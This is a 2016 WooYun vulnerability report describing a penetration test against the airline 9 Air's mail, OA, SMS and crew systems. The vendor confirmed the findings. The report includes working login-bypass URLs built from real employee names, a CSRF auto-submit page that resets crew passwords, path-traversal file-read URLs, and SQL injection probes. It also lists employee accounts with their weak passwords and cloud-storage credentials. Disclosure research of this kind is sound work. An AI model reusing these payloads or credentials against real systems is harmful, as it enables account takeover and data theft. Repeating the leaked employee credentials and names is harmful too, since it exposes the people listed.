当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205283

漏洞标题:一次对九元航空的渗透测试

相关厂商:9air.com

漏洞作者: harbour_bin

提交时间:2016-05-05 14:40

修复时间:2016-06-19 15:50

公开时间:2016-06-19 15:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

看到九元航空在乌云上注册了, 就测试一下

详细说明:

#1 邮箱信息收集+泄漏密码采集, 获取一下邮箱帐号
http://mail.9air.com/

[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] 9air.com
[email protected] jyh9air.com
[email protected] 8air.com
[email protected] 8air.com
[email protected] 8air.com
[email protected] 8air.com
[email protected] 8air.com
[email protected] 8air.com
[email protected] 9air.com2015
[email protected] 9air.com2015
[email protected] 9air.com2015


泄漏敏感文件、通讯录、内网信息和监控信息等

9air-mail.png


#2 业务逻辑

http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
直接进去了
分析后, 发现username、airuser.aircrewName、airuser.aircrewDepartment.aircrewDeptCode三个正确就可以进去了
实例1: 
http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
实例2:
http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A


SMS

9air-sms.png


9air-sms-1.png


高卫星

9air-sms-2.png


crew系统修改密码处

http://crew.9air.com/personal_change_password.jsp


<!doctype html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="Generator" content="EditPlus®">
  <meta name="Author" content="">
  <meta name="Keywords" content="">
  <meta name="Description" content="">
  <title>Document</title>
</head>
<body>
    <form method="post" action="http://crew.9air.com/personal_change_password.jsp" id="edit">
        <input name="newPass" type="text" value="9air.com1">
        <input name="validPass" type="text" value="9air.com1">
     </form>
</body>
<script>
        document.getElementById("edit").submit();
</script>
</html>


Crew系统, 修改密码处未验证验证原密码, 结合邮箱, 可CSRF实现密码修改
#3 文件读取

sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/web.xml
sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/classes/log4j.properties


9air-sms-file.png


9air-sms-file1.png


#4 SQL注入

http://oa.9air.com:8081//services/


9air-oa-2.png


举例

9air-oa-3.png


1' or 'a'='a 结果为4
1' or 'a'='b 结果为5
用户名长度

9air-oa-6.png


具体可参考
WooYun: 泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
WooYun: 泛微OA某接口无需登录可执行任意SQL语句(附脚本)
#5 帐号体系控制不严, 进入多个系统
http://crew.9air.com/

dingjun	9air.com
zhaohaili
wangxiong
lixiaoming
chenli
chenhao
lijinglin
caoyuanhe
zhangben
liuyongqiang
jiazhenxiu
lijiayi 888888
wangren
liuguangping
limengkan
shizhaojin
fengbo
jiangchao
yangsibo
zhuxingyan
songyuan
yangxiangdong
wangqi
wangyao
wuyuhao
houfeiyu
liuyiming
hudongli
caoning
yangjin
yangyidong
fuyu
chenweibin
caoyuanhe
yangjian
chenyupei
wenxudong
sunshina
liujingwen
zhaoyafang
yanyu
zhangxinyu
cuiyongtao
qiaozhu
lijiaming
zhaodongchen
hejian
hanfanliang
changxiaobo
xulihao
fangxiangyun
maquan
xiaohaodi
wangyiran
lichaoa
liangshuang
tianmeng
liuquan
huqigang
yangqining
heli 8air.com
gechunlian  abc123456
liyuzhu 123456
hejiangtao 123456
liuyingbing a123456


9air-crew1.png


oa.9air.com
举例说明, 还有很多的

高卫星 9air.com
关锋 9air.com


9air-oa.png


9air-oa-1.png


http://203.156.207.29:8080/mes/

Payload1	Payload2	Status	Length
niejiangnan	aaaa	200	18830
yanjun	123456	200	15292
luochihong	aaaa	200	8547
xuweibiao	aaaa	200	8350
huanghe	aaaa	200	8344
yiniansheng	aaaa	200	7868
wangchunhui	aaaa	200	1035
sujianlin	aaaa	200	1033
liusiqi	aaaa	200	1031
xuqinghai	aaaa	200	1030


9air-mes.png


#5 外围信息

微云 3091984313或者[email protected]  密码:dingjianchejian
百度云 [email protected],密码:9air.com;
       [email protected],密码:9air.com

漏洞证明:

已证明!

修复方案:

1、邮箱弱密码不能只是发邮件, 是否可以强制修改
2、业务逻辑部分, 重新设计一下
3、OA的SQL注入问题, 联系泛微吧
4、多个系统账户体系问题, 添加验证码+修改弱口令
5、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-05 15:48

厂商回复:

万恶的弱密码。

最新状态:

暂无